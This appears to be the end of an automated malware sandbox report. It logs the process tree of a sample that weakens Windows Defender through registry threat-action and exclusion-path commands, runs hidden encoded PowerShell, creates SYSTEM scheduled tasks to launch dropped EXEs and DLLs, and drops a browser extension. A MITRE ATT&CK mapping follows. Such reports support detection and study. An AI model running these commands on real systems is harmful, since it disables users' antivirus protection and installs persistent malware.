"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:3192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4608

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2052

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1396

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:3236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2288

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:2180

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:4328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:1228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:1864

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4044

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3132

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2768

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2956

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3880

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:2800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2212

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1412

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
3⤵
PID:3192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
3⤵
PID:4828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
3⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
3⤵
PID:852

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMcnYgWbv" /SC once /ST 04:16:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2768

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3724

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMcnYgWbv"
2⤵
PID:1872

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMcnYgWbv"
2⤵
PID:4032

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 13:59:21 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe\" XT /rBsite_idGuS 385118 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4796

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BAnwxolbGpCzXNxkj"
2⤵
PID:3504

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4796

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3868

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1624

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe
C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe XT /rBsite_idGuS 385118 /S
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:1600

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"
2⤵
PID:4148

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:1368

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:956

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:2128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1712

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:3472

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3532

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1904

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "qbSDwEgyNYPZlGA"
2⤵
PID:3920

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:3368

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"
2⤵
PID:3396

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:448

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\DnXqKSf.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4224

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4852

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:4564

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:4592

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 04:13:59 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll\",#1 /Fosite_idXfG 385118" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4608

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
2⤵
PID:4888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:228

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
2⤵
PID:4852

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118
1⤵
PID:764

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118
2⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:1152

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
3⤵
PID:1508

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:2128

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
PID:3832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery